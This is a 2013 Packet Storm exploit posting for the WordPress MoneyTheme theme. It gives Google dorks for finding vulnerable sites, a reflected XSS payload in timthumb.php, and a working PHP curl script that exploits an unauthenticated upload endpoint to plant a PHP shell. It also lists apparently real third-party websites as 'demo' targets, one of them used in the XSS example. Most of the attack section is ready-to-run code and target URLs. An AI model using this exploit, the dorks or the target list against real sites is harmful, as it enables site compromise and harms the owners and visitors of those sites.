WordPress MoneyTheme Cross Site Scripting / Shell Upload

2013-10-29T00:00:00
ID PACKETSTORM:123819
Type packetstorm
Reporter DevilScreaM
Modified 2013-10-29T00:00:00

Description

                                        
                                            `#Title : Wordpress MoneyTheme Themes XSS / Arbitrary File Upload  
  
#Author : DevilScreaM  
  
#Date : 10/27/2013  
  
#Category : Web Applications  
  
#Type : PHP  
  
#Vendor : http://themesjunction.com  
  
#Link : http://themesjunction.com/theme/money_wordpress_template-17129.html  
  
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security  
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber  
  
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |  
  
#Vulnerabillity : XSS, Arbitrary File Upload  
  
#Dork :   
  
inurl:themes/MoneyTheme/  
inurl:wp-content/themes/MoneyTheme/  
  
  
Cross Site Scripting  
  
Vulnerable At 'timthumb.php'  
  
http://site-target/wp-content/themes/MoneyTheme/timthumb.php?src=[XSS].jpg  
  
Example :  
  
http://cheapcompoundbow.com/wp-content/themes/MoneyTheme/timthumb.php?src=<h1>DevilScreaM</h1>.jpg  
  
  
====================================================================================================  
  
Arbitrary File Upload  
  
Exploit :  
  
<?php   
  
$uploadfile="devilscream.php";   
  
$ch = curl_init("http://site-target/wp-content/themes/MoneyTheme/uploads/upload.php?folder=/wp-content/themes/MoneyTheme/uploads/uploads/");   
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));   
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);   
$postResult = curl_exec($ch);   
curl_close($ch);   
print "$postResult";   
  
?>  
  
  
Shell Access : http://site-target/wp-content/themes/MoneyTheme/uploads/uploads/devilscream.php   
  
devilscream.php  
<?php   
phpinfo();   
?>  
  
Demo :  
  
http://wellontop.com/wp-content/themes/MoneyTheme/uploads/upload.php   
http://copiouscash.com/wp-content/themes/MoneyTheme/uploads/upload.php  
`